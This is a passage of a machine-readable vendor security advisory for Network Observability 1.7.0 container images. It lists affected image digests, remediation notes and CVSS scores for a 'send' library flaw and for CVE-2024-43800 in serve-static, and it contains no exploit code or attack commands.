"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", 